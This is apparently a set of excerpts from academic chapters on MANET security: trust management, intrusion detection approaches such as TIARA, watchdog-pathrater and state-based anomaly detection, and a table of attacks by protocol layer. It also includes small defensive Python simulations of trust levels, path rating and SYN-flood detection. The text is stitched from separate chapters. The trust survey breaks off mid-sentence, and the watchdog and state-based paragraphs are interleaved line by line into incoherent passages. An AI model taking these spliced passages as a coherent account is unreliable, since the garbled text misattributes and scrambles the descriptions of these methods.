The adoption of the concept of trust as the basis for engineering secure collaborative applications is currently attracting relevant research interest. Trust has always been an important element in the establishment of relationships in many fields. Humans use trust daily to promote interaction and to accept risk in situations where they have only partial information (Cahill et al., 2003). In computing, the need for trust models and support systems has recently grown with the widespread Internet usage where transactions involve entities spanning a range of domains and organizations, not all of which may be trusted to the same extent. Recently, trust issues have taken on more urgency due to wireless environments of emerging relevance populated by a plethora of unknown and anonymous users/devices. Entities can interact as far as they are able to autonomously assess trust and to use this as the basis for automated decision making, for example, whether to use a service or whether to permit access to resources.

Incorporating trust in wireless Internet systems is important because trust can be an enabling technology for application provisioning in open and dynamic environments, in situations where we have given up complete control because traditional security solutions are inadequate or even inapplicable. For instance, certificate-based authentication and authorization mechanisms exhibit several limitations when deployed over ad hoc wireless scenarios. First, they impose too much computational overhead (especially due to certificate validation), often intolerable for mobile devices with limited computational resources. Second, the transient nature of ad hoc collaborations does not justify the effort of going through the laborious and expensive certificate issuance process. Finally, the lack of central authority and network infrastructure in MANET, coupled with the dynamic nature of the network topology, complicates the adoption of certificate-based authentication and authorization mechanisms.

Trust-related research has been carried out along several different directions and has proposed many approaches for trust definition, formation, evolution, and management, but has not yet achieved universally accepted techniques/tools, as detailed in the following.

Trust Definition and Properties

Trust is a complex and multifaceted notion relating to belief in the honesty, truthfulness, competence, and reliability of a trusted person or service (Grandison & Sloman, 2000). Currently there is no consensus in the literature on the meaning of trust, though several research activities recognize its importance. Due to the fact that trust is an integral part of human nature, it is normally treated as an intuitive and universally understood concept. However, by realizing that it is unwise to assume it is an intuitive, universal, and well-understood concept, many researchers have proposed different definitions of trust, and the importance of trust standardization is widely recognized (Frank & Peters, 1998; Gambetta, 2001; Marsh, 1994; Staab, 2004). However, trust definitions vary depending on researcher background and on the addressed application domain.

Despite these differences, most proposals result in having common basic properties. Trust is usually specified in terms of a relationship between two entities that specifies the expectation of the trust-assigning entity, called the trustor, about the actions of another entity (the object of a trust estimation), that is, the trustee, within a specified context (Grandison & Sloman, 2000). Entities bound by a trust relationship may be completely or partially unknown to each other.

Trust relationships may differ depending on the number of entities involved. They include one-to-one relationships between two entities, one-to-many in the case of one entity that needs to trust a group, many-to-many in the case, for example, of a committee, or many-to-one in the case of departments trusting a head branch. In any case, a trust relationship is asymmetric: trustor and trustee do not need to have similar trust in each other even if they exploit the same information as their basis to establish their trust relationship. This derives from the observation, common to all definition proposals, that trust is a subjective notion (Cahill et al., 2003).
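The properties just listed (a trustor, a trustee, a specified context, asymmetry and subjectivity) can be captured by a small evidence store. The following is an added example, not code from the chapter or from any framework it surveys. The way a level is derived from evidence (a smoothed share of positive outcomes, so that a stranger sits at 0.5) and the required level attached to each action are this example's own assumptions; the peers, contexts and observation history are constructed.

```python
"""Context-specific, asymmetric trust relationships between peers.

Added example, not code from the chapter. The level estimate and the
per-action required levels are assumptions of this example.
"""
from collections import defaultdict
from typing import Dict, List, Tuple

Relationship = Tuple[str, str, str]   # (trustor, trustee, context)


class TrustStore:
    def __init__(self) -> None:
        # evidence per relationship: [positive outcomes, negative outcomes]
        self._evidence: Dict[Relationship, List[int]] = defaultdict(lambda: [0, 0])

    def record(self, trustor: str, trustee: str, context: str, outcome_ok: bool) -> None:
        """Trustor records one observed outcome of trustee's action in a context."""
        self._evidence[(trustor, trustee, context)][0 if outcome_ok else 1] += 1

    def level(self, trustor: str, trustee: str, context: str) -> float:
        """Trustor's trust in trustee for this context only, in [0, 1].

        Laplace-smoothed share of positive outcomes: no evidence gives 0.5.
        The key is the full triple, so nothing leaks between contexts or
        between the two directions of a pair (asymmetry).
        """
        pos, neg = self._evidence.get((trustor, trustee, context), [0, 0])
        return (pos + 1) / (pos + neg + 2)

    def decide(self, trustor: str, trustee: str, context: str, required: float) -> bool:
        """Engage only if the context-specific level reaches what the action needs."""
        return self.level(trustor, trustee, context) >= required


# Constructed: the trust level each action needs (riskier actions need more).
REQUIRED_LEVEL = {
    ("file-sharing", "read-public"): 0.6,
    ("file-sharing", "write-shared"): 0.85,
    ("emergency-response", "relay-alert"): 0.8,
}


def build_demo_store() -> TrustStore:
    """Constructed history: alice has watched bob serve files 8 times well, once badly."""
    store = TrustStore()
    for _ in range(8):
        store.record("alice", "bob", "file-sharing", outcome_ok=True)
    store.record("alice", "bob", "file-sharing", outcome_ok=False)
    return store


def demo() -> Dict[str, object]:
    store = build_demo_store()
    return {
        # (8 + 1) / (9 + 2)
        "alice_trusts_bob_file_sharing": round(store.level("alice", "bob", "file-sharing"), 3),
        # asymmetry: bob holds no evidence about alice
        "bob_trusts_alice_file_sharing": store.level("bob", "alice", "file-sharing"),
        # no transfer across contexts: same pair, different context
        "alice_trusts_bob_emergency": store.level("alice", "bob", "emergency-response"),
        "read_public_ok": store.decide("alice", "bob", "file-sharing",
                                       REQUIRED_LEVEL[("file-sharing", "read-public")]),
        "write_shared_ok": store.decide("alice", "bob", "file-sharing",
                                        REQUIRED_LEVEL[("file-sharing", "write-shared")]),
        "relay_alert_ok": store.decide("alice", "bob", "emergency-response",
                                       REQUIRED_LEVEL[("emergency-response", "relay-alert")]),
    }
```

Keying the store on the whole triple is what enforces the two properties the section stresses: bob's view of alice is a separate record from alice's view of bob, and a level earned in file sharing says nothing about emergency response, where bob remains a stranger and is refused the higher-risk action.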



A crucial characteristic of trust, especially in wireless collaborative environments, is that trust is context-specific, that is, trust attributes depend on the context where trust is evaluated. For instance, honesty might be more significant for financial applications, whereas competence could be relevant for medical applications. In addition, the trust level determined in one context does not directly transfer to another application domain.

Trust is also inherently linked to risk, typically with an approximate inverse relationship, where risk is the probability of loss with respect to an interaction (English, Terzis, & Wagealla, 2004; Josang & Presti, 2004; Marsh, 1994; Sloman, 2004). The riskier an activity is, the higher is the trust level required to engage in the activity. The analysis of the exact relationship between risk and trust is a key issue for enabling cooperation, but there is still little work on risk analysis within trust management models.

Trust Management Systems

Trust management is the activity of collecting, codifying, analyzing, evaluating, and reevaluating evidence that relates to trust attributes with the purpose of making assessments and decisions about trust relationships. Several solutions have been proposed, each tailored to specific computing environments and focusing only on a subset of trust management problems (Ruohomaa & Kutvonen, 2005; Srinivasan, Teitelbaum, Liang, Wu, & Cardei, in press). The aim of this section is not to provide an exhaustive survey of all trust management systems, but to overview some exemplar state-of-the-art solutions along their historical evolution to point out how and to what extent they can address the heterogeneity and dynamicity of the targeted wireless environments. The section also examines the recent trust-related MANET research work and outlines the novel research directions in the field of trust management that provide useful guidelines for the design of appropriate models to secure wireless ad hoc collaborations.

The issue of trust was initially studied in the area of distributed systems, where it has been faced in close association with authentication and authorization. Trust between entities is typically established by means of credentials, such as digital certificates, that act as proofs of either the identity of credential owners or the membership of credential owners in a trusted group. For instance, a digital certificate issued by a certification authority proves that a public key is owned by a particular entity. The certification authority vouches for the authenticity of the key owner's identity. Credential-based trust management solutions are designed to verify the authenticity of credentials and to determine whether certain credentials are sufficient for performing a certain action, that is, to decide how much to trust a given credential or its issuer/owner (Blaze, Feigenbaum, & Keromytis, 1998; Blaze, Feigenbaum, & Lacy, 1996; Chu, Feigenbaum, LaMacchia, Resnick, & Strauss, 1997). These approaches, however, have some limitations. They do not precisely define how trust is built and do not provide any model/tool to support trust formation and evolution. For instance, PolicyMaker and KeyNote focus on access control issues based on credential attributes rather than on trust evolution and reasoning issues. In addition, these trust management solutions usually assume a static form of trust. Moreover, traditional approaches can only be deployed in centrally administered settings with mostly fixed and known entities, where a centralized trusted authority stores information about the involved entities (Blaze et al., 1996, 1998).

To overcome the aforementioned limitations, trust solutions have recently evolved to better take into account the characteristics of open and dynamic environments. The Sultan trust management framework provides a wider notion of trust and allows the specification, analysis, and management of complex trust relationships. In particular, it includes a language for describing trust and recommendation relationships (Grandison & Sloman, 2003). In the Sultan model, a trustor can specify whether a trusted entity can perform (or not) actions when associated with a specific trust level within a specific context. The trust level is a measure of belief in the honesty, competence, security, and dependability of the trustee; the context defines the conditions to satisfy to establish a trust relationship. The proposed approach requires


Cutting the Gordian Knot: Intrusion Detection Systems in Ad Hoc Networks

Figure 5. Modularized IDS architecture

ing is monitoring of user behavior. A host-based monitor module exists in every node; however, a network-based monitor exists only in a selected few. Decision making and response modules exist in every node.

The entire ad hoc network is segregated into clusters. Each cluster has a cluster-head, which runs the network-based monitoring. Therefore, packet-level monitoring is done by the cluster-head. Individual nodes use the packet-level audits from the cluster-head to improve the performance of the host-based intrusion detection system.

The strength of this IDS architecture is the augmentation of network-based IDS with host-based IDS. The combination of these mechanisms has proved very efficient in conventional IDS. Furthermore, the authors have eliminated the single point of failure by distributing the cluster-heads. This also distributes the management load between the cluster-heads of the network. Also, the host-level basis of decision making on an intrusion makes this approach robust against attacks on the IDS itself.

However, the architecture's trust in the cluster-head is its weak point. Malicious behavior of a cluster-head will lead to the compromise of all nodes under its control. In addition, similar to the other two mobile agent-based IDS, this architecture assumes secure routing, which may not be true.

Distributed IDS

Distributed IDS differs significantly from mobile agent-based IDS. Zhang, Lee, and Huang (2003) in their pioneering work propose a distributed IDS. The IDS architecture, as shown in Figure 6, consists of local and cooperative intrusion detection engines. These detection engines are interfaced with their respective response modules.

A local intrusion detection system is a typical host-based IDS. The cooperative intrusion detection engine is used to decide globally about a particular behavior pattern. The collection of all cooperative detection engines on all nodes forms a global intrusion detection engine. Semantically, cooperative detection is analogous to network-based intrusion detection. However, a global decision on behavior patterns will not dominate the local decision. Nonetheless, the global decision will aid the local response. A few incorrect decisions about a behavioral pattern will not affect the global decision, as a larger number of correct decisions will invalidate the incorrect decisions.

The local detection engine functions autonomously, independent of other nodes' detection engines. The cooperative engine will not aid the local detection engine in identifying a malicious behavior pattern. This prevents propagation of malicious or


Figure 6. Distributed IDS architecture

wrong detection to other nodes. However, the local response to an attack is aided by the cooperative detection engine. Furthermore, a global response is deduced by collecting information from the various local intrusion detection engines of all nodes in the network. Eventually, this global response will be used for the response action for that particular behavior pattern.

Although global decision sharing is secure compared with behavior-pattern sharing, the authors did not discuss how local intrusion detection relies on the global responses. Routing insecurity gives an attacker the ability to create nonexistent nodes. Therefore, the attacker can emulate malicious behavior for these nonexistent nodes. Thus, the real majority of benign nodes will not help to guarantee the security of the distributed IDS.

Methodologies

TIARA

Techniques for intrusion-resistant ad hoc routing algorithms (TIARA) is essentially an intrusion prevention model (Ramanujan, Ahamad, Bonney, Hagelstrom, & Thurber, 2000). TIARA is a conglomeration of innovative techniques which provides:

• Light-weight firewalls
• Traffic policing
• Intrusion tolerant routing
• Intrusion detection
• Flow monitoring
• Reconfiguration mechanisms
• Multipath routing
• Source initiated route switching

It aims to minimize the damage incurred on the ad hoc network by destructive attacks such as DoS, distributed denial of service (DDoS), and so forth. Routing and data traffic are protected by TIARA. TIARA is a distributed framework. TIARA is a highly efficient cross-layer intrusion prevention and detection mechanism. Exploring each of these techniques is beyond the scope of this chapter. Mishra has briefly discussed these techniques in his survey of ad hoc IDS.

However, it should be noted that intrusion detection is one module in the collection of techniques. The operational efficiency of the intrusion detection is unknown. Furthermore, tolerance to attacks is not the fundamental goal of an intrusion detection system. Unless the attackers are eliminated from the network or the attack is identified and segregated from benign traffic, the network is always under threat. Persistent attacks have a high probability of success. Therefore, immediate response to attack


is critical. TIARA has no response system for intrusions.

Threshold-Based Detection

A simplistic approach to ad hoc IDS is threshold-based detection. Bhargava and Agrawal (2001) propose an ad hoc IDS which prevents internal attacks (attacks from within the network). Internal attacks are exhibited by nodes belonging to the network which behave maliciously, either by themselves or when compromised. Each node maintains a local variable called "MalCount" for every other node, which is increased for a particular node if its behavior is suspicious. Thus the MalCount array in a node tracks the level or state of suspicion that the host node has regarding the other nodes. Each node shares its local state of suspicion with respect to a particular node with the other nodes in the network using a special packet, REMAL. When a node receives a REMAL, it increases its local MalCount for the particular node under suspicion.

The authors overlooked many aspects of ad hoc security. First, malicious knowledge sharing using REMAL will have a cumulative malign effect on the network. Second, the security of the REMAL packet is unknown. Eventually, the entire network can be under threat by trusting unreliable REMAL packets. The crucial aspect of the security of the IDS itself is not considered in this methodology. Furthermore, routing security is not addressed.

Another interesting approach called watchdog-pathrater, which also uses a threshold, is proposed by Sergio, Giuli, Kevin, and Mary (2000). Watchdog-pathrater, as the name implies, has a monitor and an evaluator. Unlike Bhargava and Agrawal's
threshold, the node is discarded from any path. This method is analogous to fault-tolerance in typical routing algorithms. This method effectively detects and responds to malicious packet dropping attacks (sinks). However, it fails to address attacks such as route invasion, route disruption, and so forth.

State-Based Anomaly Detection

One of the interesting approaches in conventional IDS models is state-based intrusion detection. Michael and Ghosh (2000) incorporate a state-based model in ad hoc intrusion detection. They propose two anomaly detection methodologies which use finite-state machines (FSM). FSM have proved successful in conventional IDS because of their adaptability and their capability of dynamically learning new attacks.

The anomaly detection methods proposed by Michael and Ghosh (2000) use protocol states. In the first method, the sequence and frequency of protocol states are monitored. Intrusion is affirmed when a particular sequence deviates significantly from normal behavior patterns or the frequency of states exceeds a threshold. To increase robustness, their second approach uses probabilistic state-based intrusion detection. Each occurrence of a suspicious protocol state increases the probability of the behavior being malicious.

These two approaches are well suited for transport and application layer protocols, which have many protocol states, and the protocol states are predictable. For example, attacks such as a TCP SYN flood attack can be detected using this approach. However, this is not true in the case of routing
(2001) approach, Watchdog-pathrater functions protocols. State sequence or frequency of states
independently and does not share information does not distinguish a malicious behavior from
with other nodes. When a packet is forwarded to a benign one. Traditionally, FSM were used to
a neighbor node, the forwarding node listens and extract semantics from user behavior through
monitors how the node behaves upon receiving application-layer protocols. In the case of ad hoc
a packet. A benign node will forward faithfully, routing protocols, semantics is not represented by
which is overheard by the monitor. However, when protocol states, but factors such as current topology,
the node does not forward the packet, the pathrater mobility, connectivity, and so forth are.
increases the failure rate for the path. The monitor
does not distinguish between maliciousness and
node faultiness. Upon the failure rate reaching the
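The watchdog-pathrater scheme described under threshold-based detection above, as an added example written for this discussion; it is not code from the chapter or from the original watchdog-pathrater proposal. The two-path topology, the trace of what the watchdog overhears, and the discard threshold are constructed assumptions. It shows the two properties the text states: the pathrater drops a path once its failure rate crosses the threshold, and the watchdog cannot tell a malicious sink from a merely faulty node, because both present as silence after a hand-off.

```python
from collections import defaultdict

# Constructed topology: two candidate paths from source S to destination D.
PATHS = {
    "via_B": ["S", "B", "D"],
    "via_C": ["S", "C", "D"],
}

# Constructed trace of what the watchdog at S overhears after handing each
# packet to a next hop: True = the neighbour re-transmitted it, False = silence.
# Node C forwards only 4 of 10 packets; whether it is malicious or merely
# faulty is invisible to the watchdog, which is the limitation the text notes.
TRACE = {
    "B": [True] * 10,
    "C": [True, False, False, True, False, False, True, False, False, True],
}

THRESHOLD = 0.5  # assumed: paths whose failure rate exceeds this are discarded


class Watchdog:
    """Per-neighbour tally of packets handed over versus packets overheard
    being forwarded. A drop is a drop; no cause is attributed."""

    def __init__(self):
        self.handed = defaultdict(int)
        self.forwarded = defaultdict(int)

    def observe(self, neighbour, was_forwarded):
        self.handed[neighbour] += 1
        if was_forwarded:
            self.forwarded[neighbour] += 1

    def failure_rate(self, neighbour):
        n = self.handed[neighbour]
        return 0.0 if n == 0 else 1.0 - self.forwarded[neighbour] / n


class Pathrater:
    """Rates each path by its worst intermediate node and discards paths whose
    failure rate exceeds the threshold (fault-tolerance style: no response
    beyond routing around the node)."""

    def __init__(self, watchdog, paths, threshold):
        self.wd = watchdog
        self.paths = paths
        self.threshold = threshold

    def path_failure_rate(self, path):
        intermediates = path[1:-1]
        return max((self.wd.failure_rate(n) for n in intermediates), default=0.0)

    def usable_paths(self):
        rates = {name: self.path_failure_rate(p) for name, p in self.paths.items()}
        return {name: r for name, r in rates.items() if r <= self.threshold}

    def best_path(self):
        usable = self.usable_paths()
        return min(usable, key=usable.get) if usable else None


def run_simulation(trace=TRACE, paths=PATHS, threshold=THRESHOLD):
    """Feed the overheard trace to the watchdog, then let the pathrater choose."""
    wd = Watchdog()
    for neighbour, observations in trace.items():
        for forwarded in observations:
            wd.observe(neighbour, forwarded)
    pr = Pathrater(wd, paths, threshold)
    return {
        "failure_rates": {n: wd.failure_rate(n) for n in trace},
        "usable_paths": sorted(pr.usable_paths()),
        "best_path": pr.best_path(),
    }


if __name__ == "__main__":
    print(run_simulation())            # C at 0.6 > 0.5, so only via_B survives
    print(run_simulation(threshold=0.7))  # a laxer threshold keeps both paths
```

Running it with the default threshold leaves only the path through B; raising the threshold to 0.7 keeps both paths and merely prefers B. The threshold is therefore the whole policy: too low and a node with a lossy radio is evicted as if it were a sink, too high and a sink that drops half its traffic stays on the path.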


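The two state-based methods described under state-based anomaly detection above, as an added example; this is not code from the chapter or from Michael and Ghosh. The first method flags a transition the protocol state machine does not allow, or a state whose frequency exceeds a threshold; the second accumulates a per-source probability with every suspicious state. The server-side TCP handshake state machine, the packet trace, the thresholds, and the probability step are all constructed assumptions. The trace contains a benign client, a source that opens many half-open connections (the SYN flood case the text gives), and a stray ACK with no preceding SYN.

```python
from collections import Counter, defaultdict

# Constructed server-side TCP handshake state machine: (state, flag) -> next state.
TRANSITIONS = {
    ("CLOSED", "SYN"): "SYN_RCVD",
    ("SYN_RCVD", "ACK"): "ESTABLISHED",
    ("SYN_RCVD", "RST"): "CLOSED",
    ("ESTABLISHED", "FIN"): "CLOSED",
    ("ESTABLISHED", "RST"): "CLOSED",
}

HALF_OPEN_THRESHOLD = 5   # assumed: more SYN_RCVD entries per source than this is a flood
SUSPICION_STEP = 0.25     # assumed: probability added per suspicious state occurrence
ALERT_PROBABILITY = 0.75  # assumed: alert once a source's suspicion reaches this

# Constructed trace of (source, source port, TCP flag) events in one window.
EVENTS = (
    [("10.0.0.2", 40001, "SYN"), ("10.0.0.2", 40001, "ACK"), ("10.0.0.2", 40001, "FIN"),
     ("10.0.0.2", 40002, "SYN"), ("10.0.0.2", 40002, "ACK")]   # benign client
    + [("10.0.0.9", 50000 + i, "SYN") for i in range(8)]       # eight half-open connections
    + [("10.0.0.5", 60000, "ACK")]                              # ACK with no prior SYN
)


def analyze(events=EVENTS, half_open_threshold=HALF_OPEN_THRESHOLD,
            step=SUSPICION_STEP, alert_probability=ALERT_PROBABILITY):
    """Run both detection methods over a trace and return their verdicts."""
    state = defaultdict(lambda: "CLOSED")   # per connection (source, port)
    syn_rcvd_count = Counter()              # method 1, frequency: SYN_RCVD entries per source
    sequence_alerts = []                    # method 1, sequence: transition the FSM lacks
    suspicion = defaultdict(float)          # method 2: probabilistic score per source

    for src, port, flag in events:
        key = (src, port)
        nxt = TRANSITIONS.get((state[key], flag))
        if nxt is None:
            # Deviation from the expected state sequence.
            sequence_alerts.append((src, port, state[key], flag))
            suspicion[src] = min(1.0, suspicion[src] + step)
            continue
        state[key] = nxt
        if nxt == "SYN_RCVD":
            syn_rcvd_count[src] += 1

    # A connection still half-open at the end of the window is a suspicious state too.
    for (src, _port), st in state.items():
        if st == "SYN_RCVD":
            suspicion[src] = min(1.0, suspicion[src] + step)

    return {
        "sequence_alerts": sequence_alerts,
        "frequency_alerts": sorted(s for s, c in syn_rcvd_count.items()
                                   if c > half_open_threshold),
        "suspicion": dict(suspicion),
        "probabilistic_alerts": sorted(s for s, p in suspicion.items()
                                       if p >= alert_probability),
    }


if __name__ == "__main__":
    for name, value in analyze().items():
        print(f"{name}: {value}")
```

The frequency check and the probabilistic score both single out the half-open source, while the stray ACK only raises a sequence alert and a low suspicion score. This works because TCP has many states and the legal sequence is fixed. The chapter's objection to applying the same machinery to ad hoc routing protocols is visible here in reverse: a routing message sequence has no comparable state machine whose violation separates a malicious node from one that simply moved.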

Future Trends

Research in ad hoc network security is in its embryonic stages. Ad hoc network IDS is even more rudimentary, since the quest for an efficient intrusion prevention mechanism is not over yet (Hubaux, Buttyan, & Capkun, 2001). Intrusion prevention and detection mechanisms are mutually productive for ad hoc security. Clearly, a concrete and practical IDS model for ad hoc networks is yet to be evolved.

Historically, conventional IDS systems were subjected to intensive research and analysis before becoming practical. Analogous to conventional IDS, ad hoc intrusion detection needs more research. It is evident that consideration of ad hoc network characteristics plays a vital role in the denouement of the IDS model. In the literature, most of the research focus was on IDS architectures. However, IDS in ad hoc networks require innovative detection strategies to resolve the issues pertaining to IDS in ad hoc networks.

To summarize, we enumerate below the observations made from the study of the ad hoc IDS models proposed in the literature.

First, routing security should be the crux of the IDS. Similar to conventional IDS, intensive statistical analysis and research is required on the feasibility of statistical and rule-based detection methodologies with respect to routing behavioral data. Routing control messages produce a new kind of audit trail. New features linked to the properties of routing control messages have to be derived. These derived parameters will aid in analyzing the feasibility of various detection methodologies.

Second, the absence of a centralized node necessitates innovative adaptation in the IDS. Adaptation is the process of learning new attacks and attack-resolving techniques (responses), as well as changing statistical parameters with respect to the ad hoc network environment. Adaptation in a highly dynamic network is an interesting and new challenge. The efficiency of various computational intelligence methods, which are also used in conventional IDS, has to be analyzed. Learning new attacks through intelligence in the ad hoc IDS paradigm is an unexplored research domain.

Finally, the most significant ad hoc network characteristics which affect the IDS model are the three Ds: distributed, decentralized, and dynamic nature. An IDS architecture which considers these three factors will essentially be efficient. However, the IDS architecture should also consider the limitations of the detection methodologies.

Conclusion

The implementation of intrusion detection systems in ad hoc networks is hindered by the inherent characteristics of these networks. These characteristics were examined and their significance was observed. The differences between conventional and ad hoc intrusion detection systems are detailed. Requirements of an effective ad hoc IDS are studied. Various proposed IDS architectures and methodologies are explored and their strengths and weaknesses are discussed. The future of ad hoc IDS depends mostly on the statistical properties of ad hoc networks' routing behaviors. Therefore, considerable research and development is required in this domain.

References

Andrew, B., Smith. (2001, May). An examination of an intrusion detection architecture for wireless ad hoc networks. Paper presented at the 5th National Colloquium for Information System Security Education.

Athanasiades, N., Abler, R., Levine, J., Owen, H., & Riley, G. (2003). Intrusion detection testing and benchmarking methodologies. Paper presented at the First IEEE International Workshop on Information Assurance, IWIAS 2003.

Awerbuch, B., Curtmola, R., Holmer, D., Nita-Rotaru, C., & Rubens, H. (2004). Mitigating Byzantine attacks in ad hoc wireless networks. Johns Hopkins University, Department of Computer Science.

Awerbuch, B., Curtmola, R., Holmer, D., Rubens, H., & Nita-Rotaru, C. (2005). On the survivability of routing protocols in ad hoc wireless networks. Paper presented at Security and Privacy for Emerging Areas in Communications Networks, SecureComm 2005.

Balajinath, B., & Raghavan, S. V. (2001). Intrusion detection through learning behavior model. Computer Communications, 24(12), 1202-1212.

Bhargava, S., & Agrawal, D. P. (2001, Fall). Security enhancements in AODV protocol for wireless ad hoc networks. Paper presented at the IEEE 54th Vehicular Technology Conference, VTC 2001.

Brutch, P., & Ko, C. (2003). Challenges in intrusion detection for wireless ad-hoc networks. Paper presented at the Applications and the Internet Workshops, 2003.

Bykova, M., Ostermann, S., & Tjaden, B. (2001). Detecting network intrusions via a statistical analysis of network packet characteristics. In Proceedings of the 33rd Southeastern Symposium on System Theory, 2001.

Debar, H., Dacier, M., & Wespi, A. (1999). Towards a taxonomy of intrusion-detection systems. Computer Networks: The International Journal of Computer and Telecommunications Networking, 31(8), 805-822.

Duda, R. O., Hart, P. E., & Stork, D. G. (2000). Pattern classification (2nd ed.). Wiley Inter-Science Publication.

Hijazi, A., & Nasser, N. (2005). Using mobile agents for intrusion detection in wireless ad hoc networks. Paper presented at the Second IFIP International Conference on Wireless and Optical Communications Networks, WOCN 2005.

Hossain, M., Bridges, S. M., & Vaughn, R. B., Jr. (2003). Adaptive intrusion detection with data mining. Paper presented at the IEEE International Conference on Systems, Man and Cybernetics, 2003.

Huang, Y. A., & Lee, W. (2004). Attack analysis and detection for ad hoc routing protocols. Recent advances in intrusion detection, proceedings (Vol. 3224, pp. 125-145). Berlin: Springer-Verlag.

Hubaux, J.-P., Buttyan, L., & Capkun, S. (2001). The quest for security in mobile ad hoc networks. Paper presented at the 2nd ACM International Symposium on Mobile Ad Hoc Networking & Computing, Long Beach, CA.

Jacoby, G. A., Marchany, R., & Davis, N. J., IV. (2004). Battery-based intrusion detection: A first line of defense. Paper presented at the Information Assurance Workshop, 2004 / Proceedings from the Fifth Annual IEEE SMC.

Kachirski, O., & Guha, R. (2002). Intrusion detection using mobile agents in wireless ad hoc networks. Paper presented at the IEEE Workshop on Knowledge Media Networking, 2002.

Kong, J., Hong, X., & Gerla, M. (2003). A new set of passive routing attacks in mobile ad hoc networks. Paper presented at the Military Communications Conference, MILCOM 2003. IEEE.

Lamport, L., Shostak, R., & Pease, M. (1982). The Byzantine generals problem. ACM Transactions on Programming Languages and Systems, 4(3), 382-401.

Little, M. (2005). TEALab: A testbed for ad hoc networking security research. Paper presented at the Military Communications Conference, MILCOM 2005. IEEE.

Michael, C. C., & Ghosh, A. (2000). Two state-based approaches to program-based anomaly detection. Paper presented at the 16th Annual Computer Security Applications Conference, ACSAC '00.

Mishra, A., Nadkarni, K., & Patcha, A. (2004). Intrusion detection in wireless ad hoc networks. IEEE Wireless Communications, 11(1), 48-60.

Nadkarni, K., & Mishra, A. (2003). Intrusion detection in MANETS: The second wall of defense. Paper presented at the 29th Annual Conference of the IEEE Industrial Electronics Society, IECON 2003.

Papadimitratos, P., & Haas, Z. (2002, January 27-31). Secure routing for mobile ad hoc networks. Paper presented at the SCS Communication Networks


Security Measures for Mobile Ad-Hoc Networks (MANETs)

Table 1. continued

Noise Signal: Increasing the noise level, which leads to a decrease of the signal to noise ratio (S/N), causes degradation of the bandwidth and roll-back of the transmission rates. In severe cases it can lead to a DoS attack.

DoS: Denial of service attacks can also impact the media access control (MAC) layer. For this, the attacker does not have to physically tamper with the infrastructure, though the ability to inject frames directly into the channel is required. A MAC-layer-based DoS attack offers the following advantages to the attacker:
- Medium independency: Since many MAC-based communication protocols (i.e., 802.11) have similar MAC layer structures, a single MAC-layer attack can devastate many different infrastructures.
- Energy efficiency: A MAC layer attack does not necessarily and directly deal with the weakening of the communication signals, therefore these types of attacks require less energy compared to physical layer attacks.

Jamming: Jamming happens when the communication channel is flooded with MAC layer queries. In this scenario, the MAC layer will not be able to service legitimate queries. Jamming can be considered as a DoS attack at the MAC layer.

Blackhole Attack: In this type of attack, the attacker (or a malicious node) advertises a zero routing metric for all destinations. This causes all the neighbor nodes to route all their packets through the attacker (node). This can also be recognized as a DoS attack at the network layer.

Wormhole Attack: In this attack, the attacker records packets at one location in the network and tunnels them to another location in the network. This can cause a denial of service (DoS) due to the invalidity of routes for the packets which are routed through this tunnel.

Byzantine Attack: This type of attack incorporates more than one attacker (malicious adversaries). A Byzantine attack involves the leaking of authentication/authorization secrets so that the malicious adversaries are indistinguishable from legitimate nodes. Therefore, when adversaries are accepted in the communication schemes, they can cause various types of malicious activities, such as route changes, route loops, and nonoptimal routes. Byzantine attacks are very hard to identify.

Information Disclosure: In this scenario, a compromised node may leak confidential and vital information to unauthorized nodes in the network, such as the geographic location of nodes (sender, receiver, and intermediate nodes), network topology, and optimal routes.

Resource Consumption Attack: This type of attack can be discussed as a physical layer issue or a network layer issue. In the network layer, this type of attack directly deals with routing issues rather than energy related issues. Therefore, a malicious node tries to consume and waste the resources in the network through network layer-related activities, such as unnecessary requests for routes, very frequent beacon packet creations, initiating a lot of route discoveries, and forwarding of stale packets to nodes.

Routing Attacks: These types of attacks deal with the routing algorithms and procedures, such as routing table overflow and poisoning, packet replication, route cache poisoning, and rushing attack. These are discussed further in the section on attacks on ad hoc routing protocols.

Others: Other types of network layer attacks include attacks on the IP header/address (address sweep scan, timestamp attack, source route attack, record route attack, and fragment DoS attack) and on the internet control message protocol (ICMP).

Attacks on TCP: Attacks on the transport control protocol (TCP) include acknowledgement (ACK) DoS, synchronization (SYN) flood, LAND attack (sending a spoofed TCP SYN packet), session and tear-down attacks, session hijacking, and port-scan attack.

Attacks on UDP: Attacks on the user datagram protocol (UDP) include port attack, UDP flooding, and session hijacking (using a valid UDP session ID).

Session, Presentation, Application: Higher layers (session, presentation, and application layers) are more specific and application oriented. These types of attacks vary in different networks and applications.

to the OSI layered model, namely, physical, MAC, network, transport, session, presentation, and application layers. Internet-based systems have adopted a more simplified five-layer approach based on the transport control protocol (TCP)/IP protocol stack suite, in which the top three layers of the seven-layer model (session, presentation, and application layers) have been merged as a single layer: the TCP/IP application layer (see Figure 2) (Adibi, Erfani, & Harbi, 2006; Lu, 2002; Manoj & Murthy, 2005).

Figure 2. OSI Model vs. TCP/IP protocol stack

Wireless Routing Protocols in General

Ad hoc routing protocols are divided into the following categories:

Proactive (Table-driven)

In these types of routing protocols, nodes constantly search for routing information and store it in tables, therefore when a route is needed, the route is already known. The major disadvantages of proactive routing protocols are:

• Consumption of relatively more bandwidth compared to an identical amount of data transfer in other routing schemes.
• Increase of traffic overhead due to the constant updates.

The advantage is that there is no delay in route and destination determination. Examples of proactive routing protocols are (Lang, 2003):

• DSDV (destination-sequenced distance vector routing)
• OLSR (optimized link state routing)

Reactive (On-demand)

In reactive protocols, routes are determined as they are needed through "route request (RREQ)" and "route reply (RREP)" inquiries (Figure 3). The advantage of a reactive routing protocol is the fact that it requires relatively less traffic overhead. The disadvantage of reactive routing protocols, however, is relatively longer delays due to the sending and receiving of RREQs and RREPs.

Figure 3. RREQ and RREP inquiries in reactive routing protocols

Examples of reactive routing protocols are (Lang, 2003):
• DSR (dynamic source routing)
• AODV (ad hoc on-demand distance vector routing)

Besides reactive and proactive schemes, other types of routing protocols include (Lang, 2003):

• Hybrid (pro-active/reactive): A blend of reactive and proactive schemes, such as the zone routing protocol (ZRP).
• Hierarchical: The topology is divided into several local regions and local traffic is handled locally, such as the hierarchical state routing protocol (HSR).
• Geographical: These protocols use geographical coordinates in locating routing information, such as location-aided routing (LAR).
• Power aware: In these protocols, power consumption is a serious factor, such as power-aware source routing (PSR) (Maleki, Dantu, & Pedram, 2002).
• Multicast: Multicasting is the transmission of data to groups of mobile hosts identified by a single destination address, such as multicast ad hoc on-demand distance vector (MAODV).

MANET Security Requirements

